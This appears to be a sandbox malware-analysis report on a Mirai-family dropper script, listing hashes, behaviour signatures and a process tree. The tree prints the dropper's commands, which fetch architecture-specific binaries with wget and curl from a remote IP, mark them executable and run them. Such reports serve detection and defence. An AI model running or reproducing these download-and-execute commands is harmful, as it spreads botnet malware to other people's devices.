Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
149s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
02/01/2025, 04:21
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
ed9afc8adb1a34f93090873f6b76ec07
-
SHA1
13b5f418f63a32c61e493995e10e3baa0b02caab
-
SHA256
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091
-
SHA512
3ef263bf7ef4cadcc3587d3ef891289cb051087c9d125a74fc8f34f16cda89ca79c2a5ae6f2d0edee3f87855de37af4a594779d6d0d332beade0654e102bd049
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1538 chmod 1578 chmod 1586 chmod 1530 chmod 1632 chmod 1570 chmod 1554 chmod 1594 chmod 1610 chmod 1646 chmod 1546 chmod 1562 chmod 1602 chmod 1618 chmod 1522 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1523 WTF /tmp/WTF 1531 WTF /tmp/WTF 1539 WTF /tmp/WTF 1547 WTF /tmp/WTF 1555 WTF /tmp/WTF 1563 WTF /tmp/WTF 1571 WTF /tmp/WTF 1579 WTF /tmp/WTF 1587 WTF /tmp/WTF 1595 WTF /tmp/WTF 1603 WTF /tmp/WTF 1611 WTF /tmp/WTF 1619 WTF /tmp/WTF 1633 WTF /tmp/WTF 1647 WTF -
Modifies Watchdog functionality 1 TTPs 30 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 30 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/1514/cmdline WTF File opened for reading /proc/1065/cmdline WTF File opened for reading /proc/1265/cmdline WTF File opened for reading /proc/710/cmdline WTF File opened for reading /proc/1511/cmdline WTF File opened for reading /proc/1512/cmdline WTF File opened for reading /proc/710/cmdline WTF File opened for reading /proc/1598/cmdline WTF File opened for reading /proc/1065/cmdline WTF File opened for reading /proc/1596/cmdline WTF File opened for reading /proc/1235/cmdline WTF File opened for reading /proc/1598/cmdline WTF File opened for reading /proc/1507/cmdline WTF File opened for reading /proc/1507/cmdline WTF File opened for reading /proc/1526/cmdline WTF File opened for reading /proc/1151/cmdline WTF File opened for reading /proc/575/cmdline WTF File opened for reading /proc/1511/cmdline WTF File opened for reading /proc/456/cmdline WTF File opened for reading /proc/1174/cmdline WTF File opened for reading /proc/541/cmdline WTF File opened for reading /proc/960/cmdline WTF File opened for reading /proc/1606/cmdline WTF File opened for reading /proc/1141/cmdline WTF File opened for reading /proc/1524/cmdline WTF File opened for reading /proc/1173/cmdline WTF File opened for reading /proc/1159/cmdline WTF File opened for reading /proc/1265/cmdline WTF File opened for reading /proc/1191/cmdline WTF File opened for reading /proc/688/cmdline WTF File opened for reading /proc/1065/cmdline WTF File opened for reading /proc/1648/cmdline WTF File opened for reading /proc/710/cmdline WTF File opened for reading /proc/1157/cmdline WTF File opened for reading /proc/1017/cmdline WTF File opened for reading /proc/1075/cmdline WTF File opened for reading /proc/1620/cmdline WTF File opened for reading /proc/970/cmdline WTF File opened for reading /proc/1548/cmdline WTF File opened for reading /proc/729/cmdline WTF File opened for reading /proc/1146/cmdline WTF File opened for reading /proc/723/cmdline WTF File opened for reading /proc/920/cmdline WTF File opened for reading /proc/1542/cmdline WTF File opened for reading /proc/553/cmdline WTF File opened for reading /proc/553/cmdline WTF File opened for reading /proc/456/cmdline WTF File opened for reading /proc/1486/cmdline WTF File opened for reading /proc/1518/cmdline WTF File opened for reading /proc/685/cmdline WTF File opened for reading /proc/673/cmdline WTF File opened for reading /proc/956/cmdline WTF File opened for reading /proc/1157/cmdline WTF File opened for reading /proc/1157/cmdline WTF File opened for reading /proc/1133/cmdline WTF File opened for reading /proc/1612/cmdline WTF File opened for reading /proc/566/cmdline WTF File opened for reading /proc/1354/cmdline WTF File opened for reading /proc/1133/cmdline WTF File opened for reading /proc/415/cmdline WTF File opened for reading /proc/1486/cmdline WTF File opened for reading /proc/1244/cmdline WTF File opened for reading /proc/1171/cmdline WTF File opened for reading /proc/1291/cmdline WTF -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1527 wget 1528 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wind.arc wget File opened for modification /tmp/wind.arm curl File opened for modification /tmp/wind.mips wget File opened for modification /tmp/wind.ppc curl File opened for modification /tmp/wind.arm6 curl File opened for modification /tmp/wind.arm7 curl File opened for modification /tmp/wind.spc wget File opened for modification /tmp/wind.arc curl File opened for modification /tmp/wind.x86_64 curl File opened for modification /tmp/wind.x86 wget File opened for modification /tmp/wind.arm5 wget File opened for modification /tmp/wind.spc curl File opened for modification /tmp/wind.m68k curl File opened for modification /tmp/wind.sh4 curl File opened for modification /tmp/wind.i468 curl File opened for modification /tmp/wind.arm5 curl File opened for modification /tmp/wind.i686 curl File opened for modification /tmp/wind.arm wget File opened for modification /tmp/wind.arm6 wget File opened for modification /tmp/wind.m68k wget File opened for modification /tmp/wind.x86 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/wind.mpsl curl File opened for modification /tmp/wind.arm7 wget File opened for modification /tmp/wind.ppc wget File opened for modification /tmp/wind.sh4 wget File opened for modification /tmp/wind.mips curl File opened for modification /tmp/wind.mpsl wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1514 -
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:1515
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/catcat wind.x862⤵PID:1521
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1523
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1527
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1528
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1531
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:1535
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1539
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i4682⤵PID:1543
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i4682⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.i468 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1547
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i6862⤵PID:1551
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i6862⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1555
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x86_642⤵PID:1559
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x86_642⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1563
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:1567
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1571
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:1575
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1579
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:1583
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1587
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:1591
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1595
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:1599
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1603
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:1607
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1611
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:1615
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-0LUECz systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1619
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:1623
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-KV5GwI systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1633
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:1637
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/chmodchmod +x config-err-IZfVsQ netplan_enwh8izm ohshit.sh snap-private-tmp ssh-9hEdEAdBTRuW systemd-private-ebf8c56e97e94b11b12c4628626e911d-bolt.service-41GAXG systemd-private-ebf8c56e97e94b11b12c4628626e911d-colord.service-0HU1IG systemd-private-ebf8c56e97e94b11b12c4628626e911d-ModemManager.service-CAm8PW systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-resolved.service-gCUm69 systemd-private-ebf8c56e97e94b11b12c4628626e911d-systemd-timedated.service-EResVb wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1647
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD52696d2b99111e232d78a0c9678a3e154
SHA119933c0b1d0b81348c862aaedbda11087b87c874
SHA2563cd86a5cc82976251f617c7ca32d6d0fa5e757a4489f0e60dd1cccff28f8b379
SHA51267a9bd12fe8499665fe2a4ae772f4685744a00bfec1452577236f626ddbd8087956609673a78b514a6e438538f815242c98dff15b83c1b8f4302130ea818b8bb